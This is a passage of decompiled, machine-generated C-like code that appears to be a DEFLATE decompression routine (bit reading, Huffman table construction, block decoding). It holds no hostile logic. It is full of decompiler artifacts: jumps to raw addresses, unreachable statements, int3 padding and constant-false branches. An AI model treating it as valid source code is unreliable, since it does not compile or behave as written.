																			}
																		}
																	}
																} else {
																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																	if(_t2190 >= 2) {
																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																		goto L468;
																	} else {
																		L439:
																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																		 *(_t2870 - 0x44) = _t1769;
																		if( *(_t2870 - 0x44) < 0) {
																			if( *(_t2870 - 8) <= 0xa) {
																				goto L452;
																			} else {
																				 *(_t2870 - 0x4c) = 0xa;
																				do {
																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
																					if( *(_t2870 - 0x44) < 0) {
																						goto L449;
																					}
																					break;
																					L449:
																					_t1769 =  *(_t2870 - 0x4c) + 1;
																				} while ( *(_t2870 - 8) >= _t1769);
																				if( *(_t2870 - 0x44) < 0) {
																					goto L452;
																				} else {
																					goto L465;
																				}
																			}
																		} else {
																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
																				L452:
																				_t2086 =  *(_t2870 - 4);
																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L463;
																				} else {
																					L453:
																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t2465 == 0) {
																						 *(_t2870 - 0xd4) = 0;
																						L461:
																						L463:
																						if(0 != 0) {
																							goto L452;
																						} else {
																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2566;
																							_t1769 =  *(_t2870 - 8) + 8;
																							 *(_t2870 - 8) = _t1769;
																							if( *(_t2870 - 8) < 0xf) {
																								goto L439;
																							} else {
																								goto L465;
																							}
																						}
																					} else {
																						L454:
																						 *(_t2870 - 0x1c) = 1;
																						_t1692 =  *(_t2870 + 8);
																						 *_t1692 = 0x1a;
																					}
																				}
																			} else {
																				L465:
																				goto L468;
																			}
																		}
																	}
																}
															} else {
																L421:
																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																	L435:
																	goto 0x1b0c45;
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																	 *(_t2870 - 8) = _t2180;
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L421;
																	} else {
																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
																		 *(_t2870 - 0x10) = _t1769;
																		goto L437;
																	}
																} else {
																	L422:
																	_t2086 =  *(_t2870 - 4);
																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																		goto L433;
																	} else {
																		L423:
																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																		if(_t2465 == 0) {
																			 *(_t2870 - 0xa4) = 0;
																			L431:
																			L433:
																			if(0 != 0) {
																				goto L422;
																			} else {
																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) = _t2566;
																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																				_t2180 =  *(_t2870 - 8);
																				if(_t2180 <  *(_t2870 - 0x24)) {
																					goto L422;
																				} else {
																					goto L435;
																				}
																			}
																		} else {
																			L424:
																			 *(_t2870 - 0x1c) = 1;
																			_t1692 =  *(_t2870 + 8);
																			 *_t1692 = 0x19;
																		}
																	}
																}
															}
														} else {
															L531:
															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
															if(_t1692 == 0) {
																L48:
																if( *(_t2870 - 8) >= 3) {
																	L62:
																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																	if(0 != 0) {
																		goto L48;
																	} else {
																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
																		_t1692 =  *(_t2870 + 8);
																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
																			_t2086 =  *(_t2870 + 8);
																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
																				if( *( *(_t2870 + 8) + 0x18) != 1) {
																					 *(_t2870 - 0x10) = 0;
																					L189:
																					if( *(_t2870 - 0x10) >= 3) {
																						goto 0x1b0a5e;
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
																						_t1743 =  *( *0x00D59D9D)();
																						_t2873 = _t2873 + 0xc;
																						 *(_t2870 - 0x10) = 0;
																						L210:
																						_t2136 =  *(_t2870 + 8);
																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
																							goto L231;
																						} else {
																							L212:
																							if( *(_t2870 - 8) >= 3) {
																								L226:
																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
																								_t1987 =  *(_t2870 - 0xc) >> 3;
																								 *(_t2870 - 0xc) = _t1987;
																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																								if(0 != 0) {
																									goto L212;
																								} else {
																									_t1743 =  *(_t2870 - 0x114);
																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x1aba14) & 0x000000ff)) = _t1743;
																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																									goto L210;
																								}
																							} else {
																								L213:
																								_t1692 =  *(_t2870 - 4);
																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																									goto L224;
																								} else {
																									L214:
																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																									if(_t2086 == 0) {
																										 *(_t2870 - 0xc0) = 0;
																										L222:
																										L224:
																										if(0 != 0) {
																											goto L213;
																										} else {
																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																											if( *(_t2870 - 8) < 3) {
																												goto L213;
																											} else {
																												goto L226;
																											}
																										}
																									} else {
																										L215:
																										 *(_t2870 - 0x1c) = 1;
																										_t2465 =  *(_t2870 + 8);
																										 *_t2465 = 0xe;
																									}
																								}
																							}
																						}
																					} else {
																						L190:
																						_t428 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
																						if( *(_t2870 - 8) >=  *_t428) {
																							L204:
																							_t456 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
																							_t464 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
																							_t468 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
																							_t2759 =  *_t468;
																							_t2000 =  *(_t2870 - 8) - _t2759;
																							 *(_t2870 - 8) = _t2000;
																							if(0 != 0) {
																								goto L190;
																							} else {
																								goto 0x1b0a4a;
																								asm("int3");
																								_t1692 =  *(_t2870 - 0x10);
																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x1aba28 +  *(_t2870 - 0x10) * 4));
																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																								goto L189;
																							}
																						} else {
																							L191:
																							_t2465 =  *(_t2870 - 4);
																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																								goto L202;
																							} else {
																								L192:
																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																								if(_t1692 == 0) {
																									 *(_t2870 - 0xe0) = 0;
																									L200:
																									L202:
																									if(0 != 0) {
																										goto L191;
																									} else {
																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																										_t453 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
																										if( *(_t2870 - 8) <  *_t453) {
																											goto L191;
																										} else {
																											goto L204;
																										}
																									}
																								} else {
																									L193:
																									 *(_t2870 - 0x1c) = 1;
																									_t2086 =  *(_t2870 + 8);
																									 *_t2086 = 0xb;
																								}
																							}
																						}
																					}
																				} else {
																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
																					_push(0x20);
																					_push(5);
																					_push( *(_t2870 + 8) + 0xbadbed);
																					_t2086 =  *0x00D59D9D;
																					 *_t2086();
																					_t2873 = _t2873 + 0xc;
																					 *(_t2870 - 0x5c) = 0;
																					while( *(_t2870 - 0x5c) <= 0x8f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0xff) {
																						 *( *(_t2870 - 0x60)) = 9;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x117) {
																						 *( *(_t2870 - 0x60)) = 7;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x11f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					L231:
																					L233:
																					if( *( *(_t2870 + 8) + 0x18) < 0) {
																						goto L350;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
																						_push(0x40);
																						_push(0);
																						_push(_t2870 - 0x1a8);
																						 *( *0x00D59D9D)();
																						_push(0x800);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
																						 *( *0x00D59D9D)();
																						_push(0x480);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
																						 *( *0x00D59D9D)();
																						_t2873 = _t2873 + 0x24;
																						 *(_t2870 - 0x64) = 0;
																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
																						}
																						 *(_t2870 - 0xd8) = 0;
																						 *(_t2870 - 0x9c) = 0;
																						_t1692 = 4 << 0;
																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
																						_t2465 = 0;
																						 *(_t2870 + 0xfffffffffffffe98) = 0;
																						 *(_t2870 - 0x64) = 1;
																						while( *(_t2870 - 0x64) <= 0xf) {
																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
																							_t2465 =  *(_t2870 - 0x64);
																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
																							_t1692 =  *(_t2870 - 0x64) + 1;
																							 *(_t2870 - 0x64) = _t1692;
																						}
																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
																							 *(_t2870 - 0x78) = 0xffffffff;
																							 *(_t2870 - 0x80) = 0;
																							while(1) {
																								_t2666 =  *(_t2870 - 0x80);
																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																									break;
																								}
																								 *(_t2870 - 0x34) = 0;
																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
																								if( *(_t2870 - 0x74) != 0) {
																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
																									_t2331 =  *(_t2870 - 0x74);
																									 *(_t2870 - 0xc8) = _t2331;
																									while( *(_t2870 - 0xc8) > 0) {
																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
																										 *(_t2870 - 0x34) = _t2331;
																										_t2719 =  *(_t2870 - 0xc8) - 1;
																										 *(_t2870 - 0xc8) = _t2719;
																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
																									}
																									if( *(_t2870 - 0x74) > 0xa) {
																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
																										if( *(_t2870 - 0x6c) == 0) {
																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
																										while( *(_t2870 - 0xd0) > 0xb) {
																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
																											} else {
																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																											}
																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
																									} else {
																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
																										while( *(_t2870 - 0x34) < 0x400) {
																											goto 0x1b0ab1;
																											asm("int3");
																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
																											_t2331 =  *(_t2870 - 0x74);
																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
																											 *(_t2870 - 0x34) = 1;
																										}
																									}
																									goto L248;
																								} else {
																									L248:
																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
																									continue;
																								}
																								break;
																							}
																							if( *( *(_t2870 + 8) + 0x18) != 2) {
																								L349:
																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
																								 *( *(_t2870 + 8) + 0x18) = _t2086;
																								goto L233;
																							} else {
																								 *(_t2870 - 0x10) = 0;
																								L274:
																								_t2669 =  *(_t2870 + 8);
																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
																								if( *(_t2870 - 0x10) >= _t1900) {
																									_t2086 = 4 << 0;
																									_t2465 =  *(_t2870 + 8);
																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
																									if(_t1903 ==  *(_t2870 - 0x10)) {
																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
																										_push( *(_t2870 + 8) + 0x2924);
																										_push( *(_t2870 + 8) + 0x40);
																										 *((intOrPtr*)( *0x001AC1F0))();
																										_push( *( *(_t2870 + 8) + 0xbadbd9));
																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
																										_push( *(_t2870 + 8) + 0xbadbed);
																										 *((intOrPtr*)( *((intOrPtr*)(0x1ac1f0))))();
																										_t2873 = _t2873 + 0x18;
																										goto L349;
																									} else {
																										L344:
																										 *(_t2870 - 0x1c) = 0xffffffff;
																										_t1692 =  *(_t2870 + 8);
																										 *_t1692 = 0x15;
																									}
																								} else {
																									L276:
																									if( *(_t2870 - 8) >= 0xf) {
																										L307:
																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																										 *(_t2870 - 0x40) = _t2296;
																										if( *(_t2870 - 0x40) < 0) {
																											 *(_t2870 - 0x48) = 0xa;
																											do {
																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
																												_t2296 =  *(_t2870 - 0x48) + 1;
																												 *(_t2870 - 0x48) = _t2296;
																											} while ( *(_t2870 - 0x40) < 0);
																										} else {
																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
																										}
																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
																										 *(_t2870 - 0xc) = _t1900;
																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
																										 *(_t2870 - 8) = _t2086;
																										_t2465 = 0;
																										if(0 != 0) {
																											goto L276;
																										} else {
																											if( *(_t2870 - 0x28) >= 0x10) {
																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
																													_t1937 =  *(_t2870 - 0x28);
																													_t841 = _t1937 + 0x1ab004; // 0x70302
																													_t2315 =  *_t841;
																													 *(_t2870 - 0x24) = _t2315;
																													L322:
																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																														L336:
																														goto 0x1b0b37;
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																														 *(_t2870 - 8) = _t1937;
																														_t2315 = 0;
																														if(0 != 0) {
																															goto L322;
																														} else {
																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x1ab008)) +  *(_t2870 - 0x8c);
																															if( *(_t2870 - 0x28) != 0x10) {
																																 *(_t2870 - 0x108) = 0;
																															} else {
																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
																															}
																															_push( *(_t2870 - 0x8c));
																															_push( *(_t2870 - 0x108));
																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
																															_t2666 = 4 << 0;
																															 *((intOrPtr*)( *0x001AC1F4))();
																															_t2873 = _t2873 + 0xc;
																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
																															goto L274;
																														}
																													} else {
																														L323:
																														_t1692 =  *(_t2870 - 4);
																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																															goto L334;
																														} else {
																															L324:
																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																															if(_t2086 == 0) {
																																 *(_t2870 - 0xbc) = 0;
																																L332:
																																L334:
																																if(0 != 0) {
																																	goto L323;
																																} else {
																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																																	 *(_t2870 - 0xc) = _t1937;
																																	_t2315 =  *(_t2870 - 8) + 8;
																																	 *(_t2870 - 8) = _t2315;
																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
																																		goto L323;
																																	} else {
																																		goto L336;
																																	}
																																}
																															} else {
																																L325:
																																 *(_t2870 - 0x1c) = 1;
																																_t2465 =  *(_t2870 + 8);
																																 *_t2465 = 0x12;
																															}
																														}
																													}
																												} else {
																													L318:
																													 *(_t2870 - 0x1c) = 0xffffffff;
																													_t1692 =  *(_t2870 + 8);
																													 *_t1692 = 0x11;
																												}
																											} else {
																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
																												_t2666 =  *(_t2870 - 0x10) + 1;
																												 *(_t2870 - 0x10) = _t2666;
																												goto L274;
																											}
																										}
																									} else {
																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																											goto L307;
																										} else {
																											L278:
																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																											 *(_t2870 - 0x40) = _t2694;
																											if( *(_t2870 - 0x40) < 0) {
																												if( *(_t2870 - 8) <= 0xa) {
																													goto L291;
																												} else {
																													 *(_t2870 - 0x48) = 0xa;
																													do {
																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
																														_t2694 =  *(_t2870 - 0x48) + 1;
																														 *(_t2870 - 0x48) = _t2694;
																														if( *(_t2870 - 0x40) < 0) {
																															goto L288;
																														}
																														break;
																														L288:
																														_t1900 =  *(_t2870 - 0x48) + 1;
																													} while ( *(_t2870 - 8) >= _t1900);
																													if( *(_t2870 - 0x40) < 0) {
																														goto L291;
																													} else {
																														goto L304;
																													}
																												}
																											} else {
																												_t1900 =  *(_t2870 - 0x40) >> 9;
																												 *(_t2870 - 0x48) = _t1900;
																												if( *(_t2870 - 0x48) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x48)) {
																													L291:
																													_t2086 =  *(_t2870 - 4);
																													if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																														 *(_t2870 - 0xb4) =  *( *(_t2870 - 4)) & 0x000000ff;
																														 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																														goto L302;
																													} else {
																														L292:
																														_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																														if(_t2465 == 0) {
																															 *(_t2870 - 0xb4) = 0;
																															L300:
																															L302:
																															if(0 != 0) {
																																goto L291;
																															} else {
																																_t2086 =  *(_t2870 - 8);
																																 *(_t2870 - 0xc) =  *(_t2870 - 0xb4) << _t2086 |  *(_t2870 - 0xc);
																																_t1900 =  *(_t2870 - 8) + 8;
																																 *(_t2870 - 8) = _t1900;
																																if( *(_t2870 - 8) < 0xf) {
																																	goto L278;
																																} else {
																																	goto L304;
																																}
																															}
																														} else {
																															L293:
																															 *(_t2870 - 0x1c) = 1;
																															_t1692 =  *(_t2870 + 8);
																															 *_t1692 = 0x10;
																														}
																													}
																												} else {
																													L304:
																													goto L307;
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							L244:
																							 *(_t2870 - 0x1c) = 0xffffffff;
																							_t2086 =  *(_t2870 + 8);
																							 *_t2086 = 0x23;
																						}
																					}
																				}
																			} else {
																				L165:
																				 *(_t2870 - 0x1c) = 0xffffffff;
																				_t2465 =  *(_t2870 + 8);
																				 *_t2465 = 0xa;
																			}
																		} else {
																			L64:
																			if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
																				L78:
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
																				_t2018 =  *(_t2870 - 8) & 0x00000007;
																				 *(_t2870 - 8) =  *(_t2870 - 8) - _t2018;
																				if(0 != 0) {
																					goto L64;
																				} else {
																					 *(_t2870 - 0x10) = 0;
																					L81:
																					if( *(_t2870 - 0x10) >= 4) {
																						 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x2920 + _t2018 * 0) & 0x000000ff | ( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff) << 0x00000008;
																						_t2465 =  *(_t2870 + 8);
																						_t1692 = ( *(_t2465 + 0x2923) & 0x000000ff) << 8;
																						if( *(_t2870 - 0x10) == (( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff | _t1692) ^ 0x0000ffff)) {
																							L117:
																							if( *(_t2870 - 0x10) == 0 ||  *(_t2870 - 8) == 0) {
																								L139:
																								if( *(_t2870 - 0x10) == 0) {
																									goto L531;
																								} else {
																									L140:
																									_t1692 =  *(_t2870 - 0x14);
																									if(_t1692 <  *((intOrPtr*)(_t2870 - 0x70))) {
																										L144:
																										_t1692 =  *(_t2870 - 4);
																										if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																											if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																											} else {
																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
																											}
																											if( *((intOrPtr*)(_t2870 - 0x104)) >=  *(_t2870 - 0x10)) {
																												 *(_t2870 - 0x100) =  *(_t2870 - 0x10);
																											} else {
																												if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																												} else {
